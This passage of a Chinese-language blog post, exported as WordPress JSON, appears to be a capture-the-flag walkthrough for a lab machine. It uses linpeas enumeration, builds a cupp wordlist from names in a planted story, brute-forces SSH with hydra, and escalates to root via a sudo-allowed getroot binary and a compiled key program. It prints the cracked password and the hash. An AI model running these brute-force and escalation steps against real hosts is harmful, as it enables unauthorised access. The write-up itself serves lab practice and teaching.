                                              .\/linpeas.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex<\/code><\/pre>\n
                                              \u627e\u5230\u4e86\u4e00\u4e9b\u6709\u610f\u601d\u7684\u4fe1\u606f\uff1a<\/p>\n
                                              \"image-20250610175108684\"<\/div>
                                              \n
                                              \"image-20250610174722752\"<\/div>
                                              \n
                                              \"image-20250610175318786\"<\/div><\/p>\n
                                              \u627e\u5230\u4e86\u4e00\u5904\u53ef\u8bfb\u9690\u85cf\u6587\u4ef6\u540d\u4e3a\uff1a\/var\/backups\/.secret\/.verysecret\/.noooooo\/note2.txt<\/code>\u770b\u4e00\u4e0b\u5185\u5bb9\uff1a<\/p>\n
                                              The Compass and the Campfire\n\nDavid knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David\u2019s calloused fingers brushed the cracked compass in his palm\u2014a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just\u2026 rerouting."\n\nJake\u2019s eyes narrowed, too sharp for comfort. "Your compass is broken."\n\nA chuckle escaped David, brittle as dry leaves. "Compasses don\u2019t break, bud. They\u2026 forget." He flipped it open, the glass fogged with age. "See? North isn\u2019t where it should be. It\u2019s where it chooses to be tonight."\n\nThe boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake\u2019s fear dissolved into giggles. David watched, throat tight. He\u2019s still young enough to laugh at squirrels.\n\n"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We\u2019ve got supplies. Let\u2019s build a fort."\n\nThey wove branches into a crooked shelter, Jake\u2019s hands steady where David\u2019s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it\u2019d always point home."\n\nJake snapped the glowstick, bathing their fort in alien green. "Does it work now?"\n\nThe needle quivered, settling northwest. Toward the distant highway hum, not their cabin\u2019s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake\u2019s pocket\u2014where a crumpled trail map peeked out, dotted with the boy\u2019s doodled dinosaurs.\n\nDawn found them at the cabin\u2019s porch, guided by Jake\u2019s roars laughter and the squirrels he\u2019d named "Sir Nibbles". The compass stayed in David\u2019s pocket, its secret safe: true north had shifted years ago, anyway\u2014from steel poles to a gap-toothed grin eating pancakes at 6 AM.<\/code><\/pre>\n
                                              \u793e\u5de5\u5bc6\u7801\u6587\u4ef6<\/h3>\n
                                              \u53d1\u73b0\u8fd9\u7bc7\u540d\u4e3a\u300a\u6307\u5357\u9488\u4e0e\u7bdd\u706b\u300b\u7684\u77ed\u6587\u63d0\u5230\u4e86\u51e0\u4e2a\u70b9\u53ef\u4ee5\u7528\u6765\u8fdb\u884c\u793e\u5de5 \uff1a<\/p>\n
                                              \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ sudo \/opt\/pwncat\/bin\/python3.9 \/usr\/bin\/cupp -i\n\ncupp.py!                 # Common\n      \\                     # User\n       \\   ,__,             # Passwords\n        \\  (oo)____         # Profiler\n           (__)    )\\   \n              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]\n                            [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don't know all the info, just hit enter when asked! ;)\n\n> First Name: David\n> Surname: \n> Nickname: \n> Birthdate (DDMMYYYY): \n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child's name: Jake\n> Child's nickname: \n> Child's birthdate (DDMMYYYY): \n\n> Pet's name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: \n> Do you want to add special chars at the end of words? Y\/[N]: \n> Do you want to add some random numbers at the end of words? Y\/[N]:\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to david.txt, counting 212 words.\n[+] Now load your pistolero with david.txt and shoot! Good luck!<\/code><\/pre>\n
                                              \u522b\u7167\u6284\u6307\u4ee4\u54c8\uff0c\u8981\u6839\u636e\u81ea\u5df1\u73af\u5883\u4fee\u6539\u54e6\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
                                              \u7206\u7834\u5bc6\u7801<\/h3>\n
                                              (remote) lamb@pwnding:\/home\/lamb$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlamb:x:1001:1001:,,,:\/home\/lamb:\/bin\/bash<\/code><\/pre>\n
                                              \u53d1\u73b0\u5c31\u8fd9\u51e0\u4e2a\u7528\u6237\uff0c\u8bf4\u660e\u793e\u5de5\u5bc6\u7801\u53ef\u80fd\u5c31\u662f\u672c\u7528\u6237\u7684\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\u767b\u5f55\uff1a<\/p>\n
                                              \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ hydra -l lamb -P david.txt -f ssh:\/\/192.168.10.102:22                                                                             \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-10 06:22:44\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 212 login tries (l:1\/p:212), ~14 tries per task\n[DATA] attacking ssh:\/\/192.168.10.102:22\/\n[22][ssh] host: 192.168.10.102   login: lamb   password: ekaJ_2016\n[STATUS] attack finished for 192.168.10.102 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-10 06:23:25<\/code><\/pre>\n
                                              \u62ff\u5230\u4e86\u4e00\u4e2a\u5bc6\u7801ekaJ_2016<\/code>\u5c1d\u8bd5\u770b\u770b\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n
                                              (remote) lamb@pwnding:\/home\/lamb$ sudo -l \n[sudo] password for lamb: \nMatching Defaults entries for lamb on pwnding:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lamb may run the following commands on pwnding:\n    (ALL : ALL) PASSWD: \/usr\/local\/bin\/getroot<\/code><\/pre>\n
                                              getroot\u83b7\u53d6\u51ed\u8bc1<\/h3>\n
                                              \u53d1\u73b0\u679c\u7136\u6709sudo\u6743\u9650\uff0c\u4ece\u524d\u9762\u7684\u4fe1\u606f\u641c\u96c6\u5c31\u770b\u5230\u8fc7\u76f8\u5173\u4fe1\u606f\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fd0\u884c\uff1a<\/p>\n
                                              (remote) lamb@pwnding:\/tmp$ which ld\n\/usr\/bin\/ld\n(remote) lamb@pwnding:\/tmp$ ls -la \/usr\/bin\/ld\nlrwxrwxrwx 1 root root 19 Mar 21  2019 \/usr\/bin\/ld -> x86_64-linux-gnu-ld\n(remote) lamb@pwnding:\/tmp$ gcc --help\nUsage: gcc [options] file...\nOptions:\n  -pass-exit-codes         Exit with highest error code from a phase.\n  --help                   Display this information.\n  --target-help            Display target specific command line options.\n  --help={common|optimizers|params|target|warnings|[^]{joined|separate|undocumented}}[,...].\n                           Display specific types of command line options.\n  (Use '-v --help' to display command line options of sub-processes).\n  --version                Display compiler version information.\n  -dumpspecs               Display all of the built in spec strings.\n  -dumpversion             Display the version of the compiler.\n  -dumpmachine             Display the compiler's target processor.\n  -print-search-dirs       Display the directories in the compiler's search path.\n  -print-libgcc-file-name  Display the name of the compiler's companion library.\n  -print-file-name=<lib>   Display the full path to library <lib>.\n  -print-prog-name=<prog>  Display the full path to compiler component <prog>.\n  -print-multiarch         Display the target's normalized GNU triplet, used as\n                           a component in the library path.\n  -print-multi-directory   Display the root directory for versions of libgcc.\n  -print-multi-lib         Display the mapping between command line options and\n                           multiple library search directories.\n  -print-multi-os-directory Display the relative path to OS libraries.\n  -print-sysroot           Display the target libraries directory.\n  -print-sysroot-headers-suffix Display the sysroot suffix used to find headers.\n  -Wa,<options>            Pass comma-separated <options> on to the assembler.\n  -Wp,<options>            Pass comma-separated <options> on to the preprocessor.\n  -Wl,<options>            Pass comma-separated <options> on to the linker.\n  -Xassembler <arg>        Pass <arg> on to the assembler.\n  -Xpreprocessor <arg>     Pass <arg> on to the preprocessor.\n  -Xlinker <arg>           Pass <arg> on to the linker.\n  -save-temps              Do not delete intermediate files.\n  -save-temps=<arg>        Do not delete intermediate files.\n  -no-canonical-prefixes   Do not canonicalize paths when building relative\n                           prefixes to other gcc components.\n  -pipe                    Use pipes rather than intermediate files.\n  -time                    Time the execution of each subprocess.\n  -specs=<file>            Override built-in specs with the contents of <file>.\n  -std=<standard>          Assume that the input sources are for <standard>.\n  --sysroot=<directory>    Use <directory> as the root directory for headers\n                           and libraries.\n  -B <directory>           Add <directory> to the compiler's search paths.\n  -v                       Display the programs invoked by the compiler.\n  -###                     Like -v but options quoted and commands not executed.\n  -E                       Preprocess only; do not compile, assemble or link.\n  -S                       Compile only; do not assemble or link.\n  -c                       Compile and assemble, but do not link.\n  -o <file>                Place the output into <file>.\n  -pie                     Create a dynamically linked position independent\n                           executable.\n  -shared                  Create a shared library.\n  -x <language>            Specify the language of the following input files.\n                           Permissible languages include: c c++ assembler none\n                           'none' means revert to the default behavior of\n                           guessing the language based on the file's extension.\n\nOptions starting with -g, -f, -m, -O, -W, or --param are automatically\n passed on to the various sub-processes invoked by gcc.  In order to pass\n other options on to these processes the -W<letter> options must be used.\n\nFor bug reporting instructions, please see:\n<file:\/\/\/usr\/share\/doc\/gcc-8\/README.Bugs>.\n\n(remote) lamb@pwnding:\/tmp$ g++ key.c -o key -B \/usr\/bin\n(remote) lamb@pwnding:\/tmp$ file key\nkey: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=e089d5a319c7c73af28b06d082802e2b3c32072e, not stripped<\/code><\/pre>\n
                                              \u8fd9\u91cc\u9700\u8981\u6307\u5b9a\u641c\u7d22\u8def\u5f84\uff0c\u4e0d\u7136\u627e\u4e0d\u5230ld<\/code>\uff0c\u5c1d\u8bd5\u6267\u884c\uff0c\u4f46\u662f\u5e76\u672a\u83b7\u53d6\u51ed\u8bc1\uff0c\u8bf4\u660e\u4ee3\u7801\u53ef\u80fd\u4e0d\u5bf9\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fee\u6539\uff1a<\/p>\n
                                              (remote) lamb@pwnding:\/tmp$ while true; do sudo \/usr\/local\/bin\/getroot $(.\/key); sleep 1; done\n^C<\/code><\/pre>\n
                                              \u5c1d\u8bd5\u4e86\u4e00\u4e0b\u524d\u9762\u7684c\u4ee3\u7801\uff0c\u53d1\u73b0\uff1a<\/p>\n
                                              (remote) lamb@pwnding:\/tmp$ gcc exp.c -o exp -B \/usr\/bin -lm  \n(remote) lamb@pwnding:\/tmp$ .\/exp\n60136\n(remote) lamb@pwnding:\/tmp$ while true; do sudo \/usr\/local\/bin\/getroot $(.\/exp); sleep 1; done\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n^C<\/code><\/pre>\n
                                              \u62ff\u5230\u51ed\u8bc1\uff0c\u8bf4\u660e\u4fee\u6539\u7684\u4ee3\u7801\u53ef\u80fd\u6709\u70b9\u95ee\u9898\uff0c\u539f\u59cbc\u4ee3\u7801\u53cd\u800c\u53ef\u4ee5\u505a\u5230\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
                                              \"image-20250610184751109\"<\/div><\/p>\n
                                              \u6210\u529f\u4e86\uff0c\u83b7\u53d6flag\u5373\u53ef\uff1a<\/p>\n
                                              root@pwnding:~# cat ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt\nflag{46511d58f2ae11ef9ea3000c29094b2d}\nroot@pwnding:~# cat monitor.sh\n#!\/bin\/bash\n\n# \u914d\u7f6e\u65e5\u5fd7\u6587\u4ef6\nLOG_FILE="\/var\/log\/server_monitor.log"\nMAX_LOG_SIZE=1048576 \n\n# \u6e05\u7406\u8fc7\u5927\u7684\u65e5\u5fd7\u6587\u4ef6\nif [ -f "$LOG_FILE" ] && [ $(stat -c%s "$LOG_FILE") -gt $MAX_LOG_SIZE ]; then\n    > "$LOG_FILE"\nfi\n\nlog() {\n    echo "[$(date '+%Y-%m-%d %T')] $1" | tee -a "$LOG_FILE"\n}\n\n# \u68c0\u67e5\u662f\u5426\u5b58\u5728\u65e7\u5b9e\u4f8b\nif [ -f "\/tmp\/server_monitor.lock" ]; then\n    log "\u68c0\u6d4b\u5230\u5df2\u6709\u76d1\u63a7\u8fdb\u7a0b\u5728\u8fd0\u884c\uff0c\u9000\u51fa\u4e2d..."\n    exit 1\nfi\n\n# \u521b\u5efa\u9501\u6587\u4ef6\ntrap 'rm -f \/tmp\/server_monitor.lock; exit 0' INT TERM EXIT\necho $$ > \/tmp\/server_monitor.lock\n\n# \u4e3b\u76d1\u63a7\u5faa\u73af\nwhile true; do\n    if ! pgrep -x "server" > \/dev\/null; then\n        log "\u68c0\u6d4b\u5230\u670d\u52a1\u672a\u8fd0\u884c\uff0c\u5c1d\u8bd5\u542f\u52a8..."\n\n        # \u5207\u6362\u7528\u6237\u5e76\u542f\u52a8\u670d\u52a1\n        if sudo -u lamb -i \/opt\/server 2>> "$LOG_FILE"; then\n            log "\u670d\u52a1\u542f\u52a8\u6210\u529f"\n        else\n            log "\u670d\u52a1\u542f\u52a8\u5931\u8d25\uff01\u9519\u8bef\u7801\uff1a$?"\n            # \u6dfb\u52a0\u5931\u8d25\u91cd\u542f\u9650\u5236\n            sleep 1\n        fi\n    fi\n    sleep 1\ndone<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
                                              easypwn \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn] \u2514\u2500$ r […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-847","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=847"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847\/revisions"}],"predecessor-version":[{"id":848,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847\/revisions\/848"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=847"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=847"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=847"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}